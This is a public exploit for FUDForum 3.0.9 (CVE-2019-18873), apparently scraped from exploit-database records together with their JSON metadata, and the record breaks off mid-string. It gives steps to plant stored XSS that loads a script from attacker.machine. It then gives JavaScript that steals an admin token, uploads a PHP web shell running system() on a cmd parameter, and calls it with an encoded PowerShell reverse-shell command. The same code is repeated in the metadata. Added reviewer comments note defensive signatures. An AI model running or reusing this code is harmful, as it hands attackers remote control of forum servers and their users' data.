# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
# Date: 2019-10-26
# Exploit Author: liquidsky (JMcPeters)
# Vulnerable Software: FUDForum 3.0.9
# Vendor Homepage: https://sourceforge.net/projects/fudforum/
# Version: 3.0.9
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
# Tested On: Windows / mysql / apache
# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
# CVE: CVE-2019-18873
// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
// The areas impacted are the admin panel and the forum.
//
// XSS via username in Forum:
// 1. Register an account and log in to the forum.
// 2. Go to the user control panel. -> Account Settings -> change login
// 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
// XSS via user-agent in Admin Panel:
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
// 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//
// Schedules grabShell() 5 s after this script runs. Nothing ties the timer to
// the upload request issued by submitFormWithTokenJS (which has no completion
// handler), so the fixed delay is a guess; on a slow target the follow-up
// request may be sent before the uploaded file exists.
// NOTE(review): setTimeout is given a string, which the browser compiles and
// evaluates like eval; the function-reference form setTimeout(grabShell, 5000)
// does the same thing without code-from-string. The handle `u` is never used,
// so the timer is never cleared.
function patience()
{
var u=setTimeout("grabShell()",5000);
}
// This function requests the uploaded PHP script (liquidsky.php), passing a command in the cmd parameter.
// The command is currently a URL-encoded PowerShell payload that is environment-specific and will need to be modified.
function grabShell()
{
// Issues a GET for the file that submitFormWithTokenJS dropped under the forum
// root. The ?cmd= value is percent-encoded; its prefix decodes to
// "powershell -EncodedCommand " and the remainder appears to be the base64
// argument for that flag, tied to the author's lab and not reusable as-is.
// Defender's view: a request for a newly created .php file under the forum
// root carrying a cmd= query string, shortly after an admin POST to
// adm/admbrowse.php, is the log signature of this chain; a WAF/IDS rule on
// "-EncodedCommand" in query strings and file-integrity monitoring of the web
// root both catch it.
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42
%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%4
3%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
// NOTE(review): `xhr` is assigned without var/let, so it becomes an implicit global.
xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
// Fire-and-forget: no response handler, so the outcome is never observed here.
xhr.send(null);
}
// Uploads a one-line PHP file through /fudforum/adm/admbrowse.php (which, from
// the fields posted here, appears to be the admin file browser) by hand-building
// a multipart/form-data POST.
// `token` is the SQ value scraped from admuser.php by the code at the bottom of
// this file; it is sent as a form field, so it is presumably a per-session
// anti-CSRF/request token. Because the script runs same-origin inside the
// admin's browser it can read that token freely — an anti-CSRF token does not
// help once a stored XSS executes in the admin's session.
// Defender's view of the underlying weaknesses: (1) user-controlled fields
// (login name, User-Agent) are rendered on admin pages without output encoding,
// which is what lets this script run at all; (2) the upload endpoint accepts an
// arbitrary filename/extension and writes it under the web root (`cur`), where
// it is served as executable PHP. Mitigations: output-encode those fields and
// add a CSP; enforce a server-side extension allowlist; store uploads outside
// the document root or in a directory with script execution disabled; monitor
// the web root for new .php files.
// No response handler is attached, so a rejected upload (wrong `currentdir`,
// expired token, strict multipart parser) fails silently.
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", '/fudforum/adm/admbrowse.php', true);
// Send the proper header information along with the request
// NOTE(review): the boundary parameter is separated from the media type by ","
// rather than the ";" multipart/form-data normally uses; a strict parser may
// reject this even though the tested stack accepted it.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");
var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory (hard-coded for the tested XAMPP layout; must match the target's install path)
var fileName = "liquidsky.php";
var url = "/fudforum/adm/admbrowse.php"; // unused: the path is passed as a literal to xhr.open above
var ctype = "application/x-php";
// Minimal web shell: whatever arrives in $_REQUEST['cmd'] goes straight to
// system() with no authentication. Once on disk it is an unauthenticated
// backdoor for anyone who can reach the URL; disabling system() via PHP's
// disable_functions limits the blast radius if such a file is ever written.
var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
var boundary = "-----------------------------9703186584101745941654835853";
var fileSize = fileData.length; // unused
// Field names below (cur, SQ, fname, tmp_f_val, d_name, file_upload) mirror the
// admbrowse.php upload form; their server-side meaning is not visible here.
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
body += currentdir + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
body += token + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
body += "1" + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
body += fileName + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
body += "Upload File" + '\r\n';
body += "--" + boundary + "--";
xhr.send(body);
}
//Grab SQ token
// Entry point. Fetches admuser.php as a parsed document, takes the value of the
// first <input> on that page (assumed to be the SQ field — brittle if the page
// layout changes), hands it to submitFormWithTokenJS, and starts the 5 s timer
// that later requests the uploaded file. All of this only does anything when
// the script is executing inside an authenticated admin's browser, i.e. after
// the stored payload in the login name or User-Agent has rendered unescaped on
// an admin page.
// Defender's view: from the server side this appears as one admin session doing
// GET adm/admuser.php, then POST adm/admbrowse.php with a .php upload, then a
// GET to a new .php under the forum root with a cmd= parameter, all within
// seconds — a sequence worth alerting on in access logs.
var req = new XMLHttpRequest();
req.onreadystatechange=function()
{
// readyState 4 = request finished; only a 200 response is scraped.
if (req.readyState == 4 && req.status == 200) {
// With responseType "document" (set below) responseXML is the parsed HTML Document.
var htmlPage = req.responseXML; /* fetch html */
// NOTE(review): no bounds check — if the page has no <input>, SQ is undefined and
// the next line throws. (Statement below lacks a semicolon; ASI closes it.)
var SQ = htmlPage.getElementsByTagName("input")[0]
submitFormWithTokenJS(SQ.value);
}
}
req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();
// Started immediately, not after the upload completes — see the note on patience().
patience();
{"id": "1337DAY-ID-33523", "bulletinFamily": "exploit", "title": "FUDForum 3.0.9 - Remote Code Execution Exploit", "description": "Exploit for php platform in category web applications", "published": "2019-11-13T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "href": "https://0day.today/exploit/description/33523", "reporter": "liquidsky", "references": [], "cvelist": ["CVE-2019-18873"], "type": "zdt", "lastseen": "2019-12-04T19:58:55", "edition": 1, "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-18873"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:415E49FD56AE97FF0EDBFA10ECE120C7"]}, {"type": "exploitdb", "idList": ["EDB-ID:47650"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155261"]}], "modified": "2019-12-04T19:58:55", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-12-04T19:58:55", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://0day.today/exploit/33523", "sourceData": "# Exploit Title : FUDForum 3.0.9 - Remote Code Execution\r\n# Date: 2019-10-26\r\n# Exploit Author: liquidsky (JMcPeters)\r\n# Vulnerable Software: FUDForum 3.0.9\r\n# Vendor Homepage: https://sourceforge.net/projects/fudforum/\r\n# Version: 3.0.9\r\n# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download\r\n# Tested On: Windows / mysql / apache\r\n# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE\r\n# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks\r\n# CVE: CVE-2019-18873\r\n\r\n\r\n// Greetz : wetw0rk, Fr13ndz, offsec =)\r\n//\r\n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.\r\n// The areas impacted are the admin panel and the forum.\r\n//\r\n// XSS via username in Forum:\r\n// 1. Register an account and log in to the forum.\r\n// 2. Go to the user control panel. 
-> Account Settings -> change login\r\n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script>\r\n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.\r\n//\r\n// XSS via user-agent in Admin Panel:\r\n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.\r\n// 2. Send the XSS payload below (from an IP associated with an account) / host the script:\r\n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php\r\n// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system.\r\n//\r\n\r\nfunction patience()\r\n{\r\n\tvar u=setTimeout(\"grabShell()\",5000);\r\n}\r\n\r\n// This function is to call the reverse shell php script (liquidsky.php).\r\n// currently using a powershell payload that will need to be modified.\r\nfunction grabShell()\r\n{\r\n\tvar url 
=\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%
46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41
%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\";\r\n \txhr = new XMLHttpRequest();\r\n\txhr.open(\"GET\", url, true);\r\n\txhr.send(null);\r\n\r\n}\r\n\r\nfunction submitFormWithTokenJS(token) {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true);\r\n\r\n // Send the proper header information along with the request\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\");\r\n\r\n var currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory\r\n var fileName = \"liquidsky.php\";\r\n var url = \"/fudforum/adm/admbrowse.php\";\r\n var ctype = \"application/x-php\";\r\n var fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\";\r\n var boundary = \"-----------------------------9703186584101745941654835853\";\r\n var fileSize = fileData.length;\r\n\r\n var body = \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n';\r\n body += currentdir + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n';\r\n body += token + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n';\r\n body += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\";\r\n body += fileData + \"\\r\\n\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n';\r\n body += \"1\" + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n';\r\n body += fileName + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: 
form-data; name=\"file_upload\"\\r\\n\\r\\n';\r\n body += \"Upload File\" + '\\r\\n';\r\n body += \"--\" + boundary + \"--\";\r\n\r\n xhr.send(body);\r\n}\r\n\r\n//Grab SQ token\r\nvar req = new XMLHttpRequest();\r\n\r\nreq.onreadystatechange=function()\r\n{\r\n if (req.readyState == 4 && req.status == 200) {\r\n var htmlPage = req.responseXML; /* fetch html */\r\n var SQ = htmlPage.getElementsByTagName(\"input\")[0]\r\n submitFormWithTokenJS(SQ.value);\r\n }\r\n}\r\n\r\nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true);\r\nreq.responseType = \"document\";\r\nreq.send();\r\n\r\npatience();\r\n\n\n# 0day.today [2019-12-04] #", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T07:12:56", "description": "FUDForum 3.0.9 is vulnerable to Stored XSS via the User-Agent HTTP header. This may result in remote code execution. An attacker can use a user account to fully compromise the system via a GET request. When the admin visits user information under \"User Manager\" in the control panel, the payload will execute. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. The problem is in admsession.php and admuser.php.", "edition": 5, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-11-12T02:15:00", "title": "CVE-2019-18873", "type": "cve", "cwe": ["CWE-79", "CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18873"], "modified": "2019-11-15T19:05:00", "cpe": ["cpe:/a:fudforum:fudforum:3.0.9"], "id": "CVE-2019-18873", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18873", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:fudforum:fudforum:3.0.9:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2019-11-13T18:28:17", 
"description": "", "published": "2019-11-13T00:00:00", "type": "exploitdb", "title": "FUDForum 3.0.9 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18873"], "modified": "2019-11-13T00:00:00", "id": "EDB-ID:47650", "href": "https://www.exploit-db.com/exploits/47650", "sourceData": "# Exploit Title : FUDForum 3.0.9 - Remote Code Execution\r\n# Date: 2019-10-26\r\n# Exploit Author: liquidsky (JMcPeters)\r\n# Vulnerable Software: FUDForum 3.0.9\r\n# Vendor Homepage: https://sourceforge.net/projects/fudforum/\r\n# Version: 3.0.9\r\n# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download\r\n# Tested On: Windows / mysql / apache\r\n# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE\r\n# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks\r\n# CVE: CVE-2019-18873\r\n\r\n\r\n// Greetz : wetw0rk, Fr13ndz, offsec =)\r\n//\r\n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.\r\n// The areas impacted are the admin panel and the forum.\r\n//\r\n// XSS via username in Forum:\r\n// 1. Register an account and log in to the forum.\r\n// 2. Go to the user control panel. -> Account Settings -> change login\r\n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script>\r\n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.\r\n//\r\n// XSS via user-agent in Admin Panel:\r\n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.\r\n// 2. Send the XSS payload below (from an IP associated with an account) / host the script:\r\n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php\r\n// 4. 
When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system.\r\n//\r\n\r\nfunction patience()\r\n{\r\n\tvar u=setTimeout(\"grabShell()\",5000);\r\n}\r\n\r\n// This function is to call the reverse shell php script (liquidsky.php).\r\n// currently using a powershell payload that will need to be modified.\r\nfunction grabShell()\r\n{\r\n\tvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%